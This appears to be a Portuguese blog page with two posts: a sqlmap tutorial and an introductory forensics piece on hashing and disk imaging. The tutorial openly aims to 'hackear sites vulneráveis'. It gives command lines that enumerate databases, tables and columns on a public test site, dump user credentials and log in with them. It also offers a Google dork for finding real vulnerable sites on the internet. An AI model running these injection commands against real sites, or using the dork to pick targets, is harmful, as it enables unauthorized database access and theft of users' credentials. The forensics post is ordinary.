sábado, 7 de janeiro de 2017

Ango Hackianos - Como usar o sqlmap

Tags
Olá pessoal neste artigo eu vou ensinar a usar o sqlmap para poder hackear sites vulneráveis.
antes de iniciares com o tutorial deverás baixar o sqlmap + python.
Se já tens o seu sqlmap e python instalados em seu computador vamos então colocar a mão na massa.
Primeiro deverás abrir o seu CMD: clique no menu iniciar do windows digite CMD e de enter para abrir.
Abrirá uma janela preta.
No CMD digite o seguinte:

 cd  /d  D:\Softwares\sqlmapproject-sqlmap-f794d9d

tal com forme a imagem a baixo


D:\Softwares\sqlmapproject-sqlmap-f794d9d --> é a localização do sqlmap no seu computador

o site que será usado será o http://testphp.vulnweb.com/ um site disponibilizado pela acunetix, site vulnerável para estudos de falhas de segurança web.

voltando no CMD vamos digitar:
sqlmap.py -u  http://testphp.vulnweb.com/artists.php?artist=2 --current-db

OBS: o site têm que terminar com uma variavel como por exemplo a variavel artist=2  do site http://testphp.vulnweb.com/artists.php?artist=2 se você colocar simplesmente assim  http://testphp.vulnweb.com/ podes ficar relaxado que não vai funcionar.
para poderes localizar de forma rápida sites vulneráveis na internet basta ir na google e pesquisar por inurl:news.php?id=1 certamente que aparecerá uma lista de resultados de sites que estão vulneráveis.

depois de você executar esta linha de código
  sqlmap.py -u  http://testphp.vulnweb.com/artists.php?artist=2 --current-db no CMD, ele certamente fará três perguntas simplesmente tecle Enter para continuar, e aparecerá os nomes das base de dados do nosso site alvo.
tal como forme mostra a imagem a baixo.

como vêm apareceu dois nomes de base de dados o 1º é acuart e outro é information_schema.
information_schema é padrão não é tão importante para nós.
o mais importante é acuart.
agora que já descobrimos os nomes de base de dados vamos enumerar as tabelas da base de dados acuart:


sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=2 -D acuart --tables
agora já descobrimos os nomes de tabelas da base de dados acuart

nós achamos uma tabela com o nome de users talvez aí possa ter algo que nos interessa o login e senha de algum usuário.
Agora vamos executar as colunas com a linha de código seguinte:
sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=2 -T users --columns


agora vamos fazer a coisa mais importante que é extrair os dados da base de dados acuart, usando a linha de código:
sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=2 --dbs -D acuart -T users -C uname,pass,name,email --dump


pelos vistos nós conseguimos hackear a base de dados e conseguir o
nome = kugjb
palavra-passe = test
email = kjsqdhewv

e agora vamos tirar proveito das informação extraidas vamos ao site:
http://testphp.vulnweb.com/login.php
e faremos o login



e despois de logado no site nós iremos parar na página de informações do usuario.

Bom pessoal se você conseguio obter os mesmos resultados parabéns caso não tente de novo verifique onde falhou, e obrigado por visitares este blog porfavor viste sempre o blog, divulga melhor o blog para poder ajudar o blog a se desenvolver, peça tutoriais que eu estarei pronto a responder obrigado.

quinta-feira, 5 de janeiro de 2017

Ango Hackianos - Computação forense "Manipulação de Evidências"

Manipulação de Evidências

Uma vez em posse da evidência, é necessário iniciar sua análise. Em uma investigação real, jamais deve-se realizar procedimentos na evidência original, mas sim em uma cópia bit-a-bit da mesma. Porém, antes de entender o procedimento de cópia, será necessário entender a autenticação das mesmas.
Vale ressaltar que o processo citado abaixo é absolutamente desnecessário em uma situação informal, como uma tentativa de recuperar arquivos deletados acidentalmente de um disco rígido.
É possível se certificar de que um arquivo é uma cópia exata de outro através da comparação de hash. Uma hash é uma sequência de caracteres que corresponde ao produto da inserção do arquivo sobre um algoritmo. Dessa forma, se apenas um bit for alterado do arquivo original, a hash resultante será diferente.
Caso queira estudar mais sobre funções hash, recomendo ler o seguinte artigo "Brevemente".
Podemos comparar hashes de arquivos utilizando o QuickHash-Windows-v2.6.9.2, que pode ser baixado de forma gratuita em https://sourceforge.net/projects/quickhash/?source=typ_redirect.
A hash de um arquivo pode ser obtida na aba File. Basta escolher o algoritmo desejado e observar sua hash correspondente.


É possível também obter a hash de todos os arquivos presentes em um diretório utilizando a aba FileS, com funcionamento de forma semelhante.
Essa ferramenta pode ser útil para encontrar um arquivo diferente dos demais em um diretório repleto de arquivos aparentemente iguais, como no exemplo abaixo.
O programa conseguiu facilmente reconhecer o arquivo modificado com base no valor de sua hash.
A aba Compare Two Files permite comparar arquivos e verificar se eles são exatamente os mesmos através de sua hash. Observe a seguir dois resultados diferentes.
Temos ainda a opção Compare Directories, que pode ser usada para comparar dois diretórios entre si e procurar por diferenças de hash ou número de arquivos.
Caso queiramos obter a hash de um conjunto de arquivos, seja ele uma pasta, directório ou unidade inteira, podemos fazê-lo utilizando o AccessData FTK Imager, que pode ser baixado gratuitamente em http://accessdata.com/product-download/digital-forensics/ftk-imagerversion-3.4.2.

De posse do programa, podemos inserir evidências (que podem ser pastas, discos físicos ou partições lógicas) e obter suas hashes através da função Verify Drive/Image.

O processo pode demorar para unidades maiores, e retorna suas respectivas hashes ao final do processo.
O mesmo programa também pode ser usado para realizar cópias bit-a-bit de unidades. É importante relevar que uma cópia bit-a-bit difere de uma cópia comum no quesito de dados copiados: a segunda opção irá copiar apenas os arquivos visíveis e manipuláveis, enquanto que a primeira copiará todos os bits do volume.
Podemos fazer isso utilizando a opção Create Disk Image e inserindo a unidade desejada. Por questões de compatibilidade com outras ferramentas(o Autopsy é realmente fresco nesse sentido), recomendo utilizar o formato E01 e não fragmentar a imagem, conforme o exemplo.
O processo também tende a demorar, e ao final deve gerar uma cópia exata dos bits presentes na unidade original. Lembre-se de comparar as hashes com futuras cópias da evidência.
Após a criação da imagem, são gerados dois arquivos: a imagem em si e um log, contendo informações valiosas sobre sua procediência. É importante que os dois sejam guardados no sistema.

Caso desejarmos explorar o conteúdo de uma imagem, podemos montá-la como uma mídia removível através de programas como o OSFMount, que pode ser baixado em http://www.osforensics.com/tools/mount-disk-images.html. A montagem é intuitiva e a unidade montada apresentará a mesma aparência da unidade original.


Ango Hackianos - Introdução a computação Forense